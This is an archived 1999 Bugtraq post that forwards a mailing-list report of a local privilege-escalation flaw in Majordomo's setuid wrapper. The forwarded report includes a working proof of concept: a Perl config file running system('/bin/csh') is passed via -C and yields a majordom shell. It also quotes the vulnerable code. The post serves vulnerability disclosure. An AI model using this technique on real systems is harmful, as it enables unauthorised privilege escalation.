[13145] in bugtraq
Re: majordomo local exploit
daemon@ATHENA.MIT.EDU (Olaf Kirch)
Wed Dec 29 22:57:11 1999
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="DKU6Jbt7q3WqK7+M"
Message-Id: <19991229172230.B3278@monad.swb.de>
Date: Wed, 29 Dec 1999 17:22:30 +0100
Reply-To: Olaf Kirch <okir@MONAD.SWB.DE>
From: Olaf Kirch <okir@MONAD.SWB.DE>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991229024744.23364.qmail@nwcst292.netaddress.usa.net>; from
btellier@USA.NET on Tue, Dec 28, 1999 at 08:47:44PM -0600
--DKU6Jbt7q3WqK7+M
Content-Type: text/plain; charset=us-ascii
While browsing the majordomo lists trying to find out if anyone
is taking care of this issue, I came across another that's in their
archive (appended below).
The comment of Dave Wolfe was that you shouldn't let untrusted users
run programs on his majordomo server.
Olaf
--
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir@caldera.de +-------------------- Why Not?! -----------------------
UNIX, n.: Spanish manufacturer of fire extinguishers.
--DKU6Jbt7q3WqK7+M
Content-Type: message/rfc822; charset=us-ascii
Content-Disposition: attachment; filename=cf-flaw
From majordomo-workers-owner Fri Dec 3 13:13:01 1999
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-980720-1) id MAA00667; Fri, 3 Dec 1999 12:57:46 -0800 (PST)
Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-980202-1) id MAA00657 for majordomo-workers@greatcircle.com; Fri, 3 Dec 1999 12:57:44 -0800 (PST)
Received: from tirin.openworld.co.uk (tirin.openworld.co.uk [194.207.107.233]) by honor.greatcircle.com (8.8.5/Honor-980202-1) with ESMTP id NAA13922 for <majordomo-workers@greatcircle.com>; Thu, 2 Dec 1999 13:55:01 -0800 (PST)
Received: from localhost (shevek@localhost)
by tirin.openworld.co.uk (8.9.3/8.9.3) with ESMTP id WAA03319
for <majordomo-workers@greatcircle.com>; Thu, 2 Dec 1999 22:00:48 GMT
Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)
From: Shevek <shevek@anarres.org>
X-Sender: shevek@tirin.openworld.co.uk
To: majordomo-workers@greatcircle.com
Subject: $cf Security flaw
Message-ID: <Pine.LNX.4.10.9912022150430.1186-100000@tirin.openworld.co.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: majordomo-workers-owner@GreatCircle.COM
Precedence: bulk
Status: RO
Content-Length: 1640
Lines: 61
I can get majordomo privelidges as a user.
shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
root@tirin /usr/local/majordomo# ls -ld .
drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./
root@tirin /usr/local/majordomo# ls -l wrapper
-rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper*
The lines in Majordomo (I found the bug by simple inspection, it's also in
resend)
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
while ($ARGV[0]) { # parse for config file or default list
if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case
$cf = $ARGV[1];
shift(@ARGV);
shift(@ARGV);
} elsif ($ARGV[0] eq "-l") {
$deflist = $ARGV[1];
shift(@ARGV);
shift(@ARGV);
} else {
die "Unknown argument $ARGV[0]\n";
}
}
if (! -r $cf) {
die("$cf not readable; stopped");
}
require "$cf";
Am I doing something wrong, or is this a general flaw? Can I simply
disable all the possible methods of setting $cf without breaking other
things? I haven't had time to inspect the system at any length, I just
glanced at it.
I am not on any greatcircle mailing lists, I would appreciate replies to
my own address if there is discussion on this subject.
Majordomo version 1.94.4
Perl 5.005_03
Ta.
S.
--
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+
US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+
t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y?
Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
--DKU6Jbt7q3WqK7+M--
